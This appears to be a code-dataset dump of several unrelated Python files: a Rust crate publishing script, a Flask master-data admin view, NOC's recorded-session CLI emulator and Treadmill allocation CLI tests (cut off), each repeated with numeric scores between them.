precondition: " + tc_key) for preCon in preCon_keys: self.logger.write_log("running precondition: " + preCon + "\n") tc_class.__dict__[preCon](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running teststeps: " + tc_key) for teststep in testStep_keys: self.logger.write_log("running teststep: " + teststep + "\n") tc_class.__dict__[teststep](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running postcondition: " + tc_key) for postCon in postCon_keys: self.logger.write_log("running postcondition: " + postCon + "\n") tc_class.__dict__[postCon](tc_obj) duration = time.time()-starttime self.logger.write_log("-------------------------------------------------") self.logger.write_log("finished testcase: " + tc_key +" in " +str(duration)[:6]) self.results.append({"name":tc_key, "duration":duration,"result":False}) return self.results
0.18159
0.102709
import subprocess import argparse import sys import os import shutil import time import friendlytoml as toml config = toml.load(os.path.join(os.path.dirname(__file__), "publish_rust.toml")) HOME = os.environ["HOME"] PROJECT_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["rust"])) USER = config["user"] GITHUB_DOMAIN = USER + ".github.io" GITHUB_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["github"]), GITHUB_DOMAIN) def publish(PROJECT, UPDATE=False): """Attempts to publish the rust project at the given path""" path = os.path.join(PROJECT_FOLDER, PROJECT) if not os.path.exists(path): return print("Could not find project directory: '{}'".format(path)) if UPDATE: print("> Force Update: ON") if not os.path.exists(GITHUB_FOLDER): print("Github repo not found, creating at '{}'...", GITHUB_FOLDER) os.makedirs(GITHUB_FOLDER) def prompt(msg): """Helper function for simple prompts""" confirmations = {"y", "yes", "yup", "yea", "sure", "indeed"} if UPDATE: return True else: print("> ", end="") res = input(msg+" (y/n)\n>>> ").lower() return res in confirmations CARGO_PATH = os.path.join(path, "Cargo.toml") cargo = toml.load(CARGO_PATH) package = cargo["package"] CRATE = package["name"] AUTHORS = package["authors"] AUTHOR_STRING = AUTHORS[0] if len(AUTHORS) == 1 else ", ".join(AUTHORS) REPOSITORY = "https://github.com/" + USER + "/" + PROJECT DOCUMENTATION = "https://" + GITHUB_DOMAIN + "/" + PROJECT + "/" + CRATE LICENSE_FILE = config["license"]["file"] LICENSE_PATH = os.path.join(path, LICENSE_FILE) LICENSE_SHORT = config["license"]["short"] README_FILE = config["readme"]["file"] README_PATH = os.path.join(path, README_FILE) TRAVIS_FILE = config["travis"]["file"] TRAVIS_PATH = os.path.join(path, TRAVIS_FILE) TRAVIS_URL = "https://travis-ci.org/" + USER + "/" + PROJECT os.chdir(path) print("> Preparing publishment") print("> Building...") res = subprocess.call(["cargo", "build"]) if res: return print("> Error while building") print("> Testing...") res = subprocess.call(["cargo", "test"]) if res: return print("> Error while testing") print("> Compiling documentation...") res = subprocess.call(["cargo", "doc"]) if res: return print("> Error while compiling documentation") # Travis CI if not os.path.exists(TRAVIS_PATH) or UPDATE: print("> Adding '{}'...".format(TRAVIS_FILE)) travis_template = config["travis"]["template"] with open(TRAVIS_PATH, "w") as f: f.write(travis_template) # License if (not os.path.exists(LICENSE_PATH)) or UPDATE: print("> Adding '{}' license at '{}'...".format(LICENSE_SHORT, LICENSE_PATH)) license_map = { "author": AUTHOR_STRING, "year": time.localtime().tm_year } license = config["license"]["long"].format_map( license_map) with open(LICENSE_PATH, "w") as f: f.write(license) # github.io Documentation source = os.path.join(path, "target", "doc") destination = os.path.join(GITHUB_FOLDER, PROJECT) if os.path.exists(destination) and prompt("Update documentation?"): print("> Cleaning destination folder...") shutil.rmtree(destination) if not os.path.exists(destination): print("> Moving new documentation files...") shutil.copytree(source, destination) # Readme if not os.path.exists(README_PATH) or prompt("Overwrite existing README?"): print("> Writing README at '{}'...".format(README_PATH)) readme_map = { "project": PROJECT, "license_short": LICENSE_SHORT, "documentation_url": DOCUMENTATION, "repository": REPOSITORY, "crate": CRATE, "travis_url": TRAVIS_URL } readme = config["readme"]["template"].format_map(readme_map) with open(README_PATH, "w") as f: f.write(readme) # Crates.io cargo metadata cargo_updated = [] def find_or_set(key, default): if (not key in package) or UPDATE: package[key] = default cargo_updated.append(True) find_or_set("readme", README_FILE) find_or_set("documentation", DOCUMENTATION) find_or_set("license", LICENSE_SHORT) if cargo_updated: print("> Updating cargo metadata...") with open(CARGO_PATH, "w") as f: toml.dump(cargo, f) print("> Done! Added to '{}'".format(destination)) def main(args=sys.argv[1:]): """Entry point""" parser = argparse.ArgumentParser() parser.add_argument("project", help="The name of the folder of the rust project to publish") parser.add_argument("-f", "--force_update", action="store_true", default=False, help="Forces everything to be updated/overwritten by default") parsed = parser.parse_args() publish(parsed.project, UPDATE=parsed.force_update) if __name__ == '__main__': main()
publish_rust.py
import subprocess import argparse import sys import os import shutil import time import friendlytoml as toml config = toml.load(os.path.join(os.path.dirname(__file__), "publish_rust.toml")) HOME = os.environ["HOME"] PROJECT_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["rust"])) USER = config["user"] GITHUB_DOMAIN = USER + ".github.io" GITHUB_FOLDER = os.path.join(HOME, os.path.join(*config["dir"]["github"]), GITHUB_DOMAIN) def publish(PROJECT, UPDATE=False): """Attempts to publish the rust project at the given path""" path = os.path.join(PROJECT_FOLDER, PROJECT) if not os.path.exists(path): return print("Could not find project directory: '{}'".format(path)) if UPDATE: print("> Force Update: ON") if not os.path.exists(GITHUB_FOLDER): print("Github repo not found, creating at '{}'...", GITHUB_FOLDER) os.makedirs(GITHUB_FOLDER) def prompt(msg): """Helper function for simple prompts""" confirmations = {"y", "yes", "yup", "yea", "sure", "indeed"} if UPDATE: return True else: print("> ", end="") res = input(msg+" (y/n)\n>>> ").lower() return res in confirmations CARGO_PATH = os.path.join(path, "Cargo.toml") cargo = toml.load(CARGO_PATH) package = cargo["package"] CRATE = package["name"] AUTHORS = package["authors"] AUTHOR_STRING = AUTHORS[0] if len(AUTHORS) == 1 else ", ".join(AUTHORS) REPOSITORY = "https://github.com/" + USER + "/" + PROJECT DOCUMENTATION = "https://" + GITHUB_DOMAIN + "/" + PROJECT + "/" + CRATE LICENSE_FILE = config["license"]["file"] LICENSE_PATH = os.path.join(path, LICENSE_FILE) LICENSE_SHORT = config["license"]["short"] README_FILE = config["readme"]["file"] README_PATH = os.path.join(path, README_FILE) TRAVIS_FILE = config["travis"]["file"] TRAVIS_PATH = os.path.join(path, TRAVIS_FILE) TRAVIS_URL = "https://travis-ci.org/" + USER + "/" + PROJECT os.chdir(path) print("> Preparing publishment") print("> Building...") res = subprocess.call(["cargo", "build"]) if res: return print("> Error while building") print("> Testing...") res = subprocess.call(["cargo", "test"]) if res: return print("> Error while testing") print("> Compiling documentation...") res = subprocess.call(["cargo", "doc"]) if res: return print("> Error while compiling documentation") # Travis CI if not os.path.exists(TRAVIS_PATH) or UPDATE: print("> Adding '{}'...".format(TRAVIS_FILE)) travis_template = config["travis"]["template"] with open(TRAVIS_PATH, "w") as f: f.write(travis_template) # License if (not os.path.exists(LICENSE_PATH)) or UPDATE: print("> Adding '{}' license at '{}'...".format(LICENSE_SHORT, LICENSE_PATH)) license_map = { "author": AUTHOR_STRING, "year": time.localtime().tm_year } license = config["license"]["long"].format_map( license_map) with open(LICENSE_PATH, "w") as f: f.write(license) # github.io Documentation source = os.path.join(path, "target", "doc") destination = os.path.join(GITHUB_FOLDER, PROJECT) if os.path.exists(destination) and prompt("Update documentation?"): print("> Cleaning destination folder...") shutil.rmtree(destination) if not os.path.exists(destination): print("> Moving new documentation files...") shutil.copytree(source, destination) # Readme if not os.path.exists(README_PATH) or prompt("Overwrite existing README?"): print("> Writing README at '{}'...".format(README_PATH)) readme_map = { "project": PROJECT, "license_short": LICENSE_SHORT, "documentation_url": DOCUMENTATION, "repository": REPOSITORY, "crate": CRATE, "travis_url": TRAVIS_URL } readme = config["readme"]["template"].format_map(readme_map) with open(README_PATH, "w") as f: f.write(readme) # Crates.io cargo metadata cargo_updated = [] def find_or_set(key, default): if (not key in package) or UPDATE: package[key] = default cargo_updated.append(True) find_or_set("readme", README_FILE) find_or_set("documentation", DOCUMENTATION) find_or_set("license", LICENSE_SHORT) if cargo_updated: print("> Updating cargo metadata...") with open(CARGO_PATH, "w") as f: toml.dump(cargo, f) print("> Done! Added to '{}'".format(destination)) def main(args=sys.argv[1:]): """Entry point""" parser = argparse.ArgumentParser() parser.add_argument("project", help="The name of the folder of the rust project to publish") parser.add_argument("-f", "--force_update", action="store_true", default=False, help="Forces everything to be updated/overwritten by default") parsed = parser.parse_args() publish(parsed.project, UPDATE=parsed.force_update) if __name__ == '__main__': main()
0.275032
0.091139
from flask import Blueprint, flash, jsonify, request, redirect, render_template, session, url_for from flask_login import login_required, current_user from ims.common.ComboBoxUtil import getComCategoryList from ims.common.Messages import Messages from ims.common.RoleUtil import admin_required from ims.contents.comCont import MasterDataList as listCont from ims.contents.comCont import MasterDetails as detailsCont from ims.form.masterDataForm import MasterDataForm from ims.service.comServ import insertUpdateMasterData as insertUpdateDto from ims.service.comServ import getComItemList as getDtoList from ims.service.comServ import getComItem as getDto from ims.service.comServ import deleteMasterData as deleteDto masterData = Blueprint('masterData', __name__) @masterData.route('/list/') @admin_required def master_list(): """マスタデータ一覧の初期表示 GETのrequestを受付 当処理はhtmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) cont = listCont(comboList) return render_template('master_data_management/master-list.html', cont=cont) @masterData.route('/list/getData/', methods = ['POST']) @admin_required def master_post_data(): """マスタデータ一覧表示用データ取得 POSTのrequestを受付 一覧画面から選択されたカテゴリーのデータを取得し、json形式でデータを返します。 :param category: 選択されたカテゴリー """ try: category = request.json['category'] models = getDtoList(category) dataset = [] for model in models: data = {} data["itemId"] = model.item_id data["itemCd"] = model.item_cd data["itemValue"] = model.item_value data["displayOrder"] = model.display_order data["isActive"] = model.is_active dataset.append(data) except: pass return jsonify(dataset) @masterData.route('/create/') @admin_required def master_create(): """マスタデータ作成処理 一覧画面から「新規作成」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/<int:itemId>/edit/') @admin_required def master_edit(itemId): """マスタデータ修正処理 一覧画面からデータの「コード」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 :param itemId: 対象データのID """ dto = getDto(itemId) if not dto: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) categoryList = getDtoList('master_combo') form = MasterDataForm() form.itemCategory.choices = [(i.item_cd, i.item_value) for i in categoryList] form.itemId.data = dto.item_id form.itemCategory.data = dto.item_category form.itemCD.data = dto.item_cd form.itemValue.data = dto.item_value form.displayOrder.data = dto.display_order form.isActive.data = dto.is_active cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/save/', methods=['POST']) @admin_required def master_save(): """マスタデータ詳細画面登録処理 formのデータをDBに保存します。 処理終了後はマスタデータ一覧画面へ遷移します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] if form.validate_on_submit(): if form.itemId.data: isUpdate = True dto = getDto(form.itemId.data) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) else: isUpdate = False data = form.data data['updateUser'] = current_user.user_id data['isActive'] = bool(form.isActive.data) try: insertUpdateDto(data, isUpdate) except Exception: return redirect(url_for('masterData.master_list')) if isUpdate: flash(Messages.SUCCESS_UPDATED, Messages.SUCCESS_CSS) else: flash(Messages.SUCCESS_INSERTED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list')) for error in form.errors.values(): flash(error[0],Messages.DANGER_CSS) cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/<int:itemId>/delete/') @admin_required def master_delete(itemId): """マスタデータ詳細画面削除処理 当該データを物理削除します。 処理終了後はマスタデータ一覧画面へ遷移します。 :param itemId: 削除対象のIDです。 """ dto = getDto(itemId) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) deleteDto(itemId) flash(Messages.SUCCESS_DELETED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list'))
ims/views/masterData.py
from flask import Blueprint, flash, jsonify, request, redirect, render_template, session, url_for from flask_login import login_required, current_user from ims.common.ComboBoxUtil import getComCategoryList from ims.common.Messages import Messages from ims.common.RoleUtil import admin_required from ims.contents.comCont import MasterDataList as listCont from ims.contents.comCont import MasterDetails as detailsCont from ims.form.masterDataForm import MasterDataForm from ims.service.comServ import insertUpdateMasterData as insertUpdateDto from ims.service.comServ import getComItemList as getDtoList from ims.service.comServ import getComItem as getDto from ims.service.comServ import deleteMasterData as deleteDto masterData = Blueprint('masterData', __name__) @masterData.route('/list/') @admin_required def master_list(): """マスタデータ一覧の初期表示 GETのrequestを受付 当処理はhtmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) cont = listCont(comboList) return render_template('master_data_management/master-list.html', cont=cont) @masterData.route('/list/getData/', methods = ['POST']) @admin_required def master_post_data(): """マスタデータ一覧表示用データ取得 POSTのrequestを受付 一覧画面から選択されたカテゴリーのデータを取得し、json形式でデータを返します。 :param category: 選択されたカテゴリー """ try: category = request.json['category'] models = getDtoList(category) dataset = [] for model in models: data = {} data["itemId"] = model.item_id data["itemCd"] = model.item_cd data["itemValue"] = model.item_value data["displayOrder"] = model.display_order data["isActive"] = model.is_active dataset.append(data) except: pass return jsonify(dataset) @masterData.route('/create/') @admin_required def master_create(): """マスタデータ作成処理 一覧画面から「新規作成」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/<int:itemId>/edit/') @admin_required def master_edit(itemId): """マスタデータ修正処理 一覧画面からデータの「コード」を押下後、GETのrequestを受付します。 htmlテンプレート及び画面用コンテンツを返します。 :param itemId: 対象データのID """ dto = getDto(itemId) if not dto: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) categoryList = getDtoList('master_combo') form = MasterDataForm() form.itemCategory.choices = [(i.item_cd, i.item_value) for i in categoryList] form.itemId.data = dto.item_id form.itemCategory.data = dto.item_category form.itemCD.data = dto.item_cd form.itemValue.data = dto.item_value form.displayOrder.data = dto.display_order form.isActive.data = dto.is_active cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/save/', methods=['POST']) @admin_required def master_save(): """マスタデータ詳細画面登録処理 formのデータをDBに保存します。 処理終了後はマスタデータ一覧画面へ遷移します。 """ categoryList = getDtoList('master_combo') comboList = getComCategoryList(categoryList) form = MasterDataForm() form.itemCategory.choices = [(i.key, i.value) for i in comboList] if form.validate_on_submit(): if form.itemId.data: isUpdate = True dto = getDto(form.itemId.data) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) else: isUpdate = False data = form.data data['updateUser'] = current_user.user_id data['isActive'] = bool(form.isActive.data) try: insertUpdateDto(data, isUpdate) except Exception: return redirect(url_for('masterData.master_list')) if isUpdate: flash(Messages.SUCCESS_UPDATED, Messages.SUCCESS_CSS) else: flash(Messages.SUCCESS_INSERTED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list')) for error in form.errors.values(): flash(error[0],Messages.DANGER_CSS) cont = detailsCont(form) return render_template('master_data_management/master-details.html', cont=cont) @masterData.route('/details/<int:itemId>/delete/') @admin_required def master_delete(itemId): """マスタデータ詳細画面削除処理 当該データを物理削除します。 処理終了後はマスタデータ一覧画面へ遷移します。 :param itemId: 削除対象のIDです。 """ dto = getDto(itemId) if dto: pass else: flash(Messages.WARNING_NOT_FOUND_ALREADY_UPDATED_DELETED, Messages.WARNING_CSS) return redirect(url_for('masterData.master_list')) deleteDto(itemId) flash(Messages.SUCCESS_DELETED, Messages.SUCCESS_CSS) return redirect(url_for('masterData.master_list'))
0.380759
0.21211
# Python modules from __future__ import absolute_import import socket # Third-party modules import tornado.gen import tornado.iostream from tornado.concurrent import TracebackFuture # NOC modules from .base import CLI from .telnet import TelnetIOStream class BeefCLI(CLI): name = "beef_cli" default_port = 23 def create_iostream(self): self.state = "notconnected" sender, receiver = socket.socketpair() self.sender = tornado.iostream.IOStream(sender) return BeefIOStream(receiver, self) @tornado.gen.coroutine def send(self, cmd): # @todo: Apply encoding cmd = str(cmd) self.logger.debug("Send: %r", cmd) if self.state != "prompt": raise tornado.gen.Return() # Will be replied via reply_state beef = self.script.request_beef() gen = beef.iter_cli_reply(cmd[: -len(self.profile.command_submit)]) self.ioloop.add_callback(self.streamer, gen) @tornado.gen.coroutine def streamer(self, gen): """ Stream gen to sender :param gen: :return: """ try: for reply in gen: yield self.sender.write(reply) yield except KeyError: # Propagate exception self.sender.write(self.SYNTAX_ERROR_CODE) yield def set_state(self, state): changed = self.state != state super(BeefCLI, self).set_state(state) # Force state enter reply if changed: self.ioloop.add_callback(self.reply_state, state) @tornado.gen.coroutine def reply_state(self, state): """ Spool state entry sequence :param state: :return: """ self.logger.debug("Replying '%s' state", state) beef = self.script.request_beef() for reply in beef.iter_fsm_state_reply(state): self.sender.write(reply) yield def close(self): self.sender.close() self.sender = None super(BeefCLI, self).close() def send_pager_reply(self, data, match): """ Beef need no pagers """ self.collected_data += [data] class BeefIOStream(TelnetIOStream): def connect(self, *args, **kwargs): """ Always connected :param args: :param kwargs: :return: """ future = self._connect_future = TracebackFuture() # Force beef downloading beef = self.cli.script.request_beef() if not beef: # Connection refused self.close(exc_info=True) return future future.set_result(True) # Start replying start state self.cli.set_state("start") self._add_io_state(self.io_loop.WRITE) return future def close(self): self.socket.close() self.socket = None
core/script/cli/beef.py
# Python modules from __future__ import absolute_import import socket # Third-party modules import tornado.gen import tornado.iostream from tornado.concurrent import TracebackFuture # NOC modules from .base import CLI from .telnet import TelnetIOStream class BeefCLI(CLI): name = "beef_cli" default_port = 23 def create_iostream(self): self.state = "notconnected" sender, receiver = socket.socketpair() self.sender = tornado.iostream.IOStream(sender) return BeefIOStream(receiver, self) @tornado.gen.coroutine def send(self, cmd): # @todo: Apply encoding cmd = str(cmd) self.logger.debug("Send: %r", cmd) if self.state != "prompt": raise tornado.gen.Return() # Will be replied via reply_state beef = self.script.request_beef() gen = beef.iter_cli_reply(cmd[: -len(self.profile.command_submit)]) self.ioloop.add_callback(self.streamer, gen) @tornado.gen.coroutine def streamer(self, gen): """ Stream gen to sender :param gen: :return: """ try: for reply in gen: yield self.sender.write(reply) yield except KeyError: # Propagate exception self.sender.write(self.SYNTAX_ERROR_CODE) yield def set_state(self, state): changed = self.state != state super(BeefCLI, self).set_state(state) # Force state enter reply if changed: self.ioloop.add_callback(self.reply_state, state) @tornado.gen.coroutine def reply_state(self, state): """ Spool state entry sequence :param state: :return: """ self.logger.debug("Replying '%s' state", state) beef = self.script.request_beef() for reply in beef.iter_fsm_state_reply(state): self.sender.write(reply) yield def close(self): self.sender.close() self.sender = None super(BeefCLI, self).close() def send_pager_reply(self, data, match): """ Beef need no pagers """ self.collected_data += [data] class BeefIOStream(TelnetIOStream): def connect(self, *args, **kwargs): """ Always connected :param args: :param kwargs: :return: """ future = self._connect_future = TracebackFuture() # Force beef downloading beef = self.cli.script.request_beef() if not beef: # Connection refused self.close(exc_info=True) return future future.set_result(True) # Start replying start state self.cli.set_state("start") self._add_io_state(self.io_loop.WRITE) return future def close(self): self.socket.close() self.socket = None
0.614625
0.087097
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import unittest import click import click.testing import mock import treadmill from treadmill import plugin_manager from treadmill.admin import exc as admin_exceptions class AdminLdapAllocationTest(unittest.TestCase): """Mock test for treadmill.cli.admin.ldap.allocation""" def setUp(self): """Setup common test variables""" self.runner = click.testing.CliRunner() self.alloc_mod = plugin_manager.load( 'treadmill.cli.admin.ldap', 'allocation' ) self.alloc_cli = self.alloc_mod.init() @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.side_effect': admin_exceptions.NoSuchObjectResult, 'create.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_create(self): """Test creating a tenant. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '123', ] ) self.assertEqual(res.exit_code, 0) tenant_admin.get.assert_called_once_with('test') tenant_admin.create.assert_called_once_with( 'test', {'systems': ['123']} ) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, 'update.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_update(self): """Test update a tenant twice. One with appending systems, Second with setting systems. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '--add-systems', '456' ] ) self.assertEqual(res.exit_code, 0) res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '456', ] ) self.assertEqual(res.exit_code, 0) get_calls = [mock.call('test')] * 2 tenant_admin.get.assert_has_calls( get_calls, any_order=False ) update_calls = [ mock.call('test', {'systems': ['123', '456']}), mock.call('test', {'systems': ['456']}) ] tenant_admin.update.assert_has_calls( update_calls, any_order=False ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None, 'get.side_effect': admin_exceptions.NoSuchObjectResult, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_create(self): """Test creating a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.create.assert_called_once_with( ['cell', 'test/dev'], { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_update(self): """Test updating a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--rank', 99, '--partition', 'fake', '-c', '58%', '--memory', '66M' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'cpu': '58%', 'memory': '66M', 'partition': 'fake', 'rank': 99 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'delete.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) def test_reservation_delete(self): """Test deleting a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_not_called() ca_admin.delete.assert_called_once_with(['cell', 'test/dev']) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update(self): """Test updating assignment, append assignment to existing assignments. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': {'cell': 'cell'}, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_empty(self): """Test updating assignment, append assignment to empty cell alloc. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 1}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_priority(self): """Test updating assignment, update priority of an existing assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '100', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 100}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete(self): """Test deleting assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) 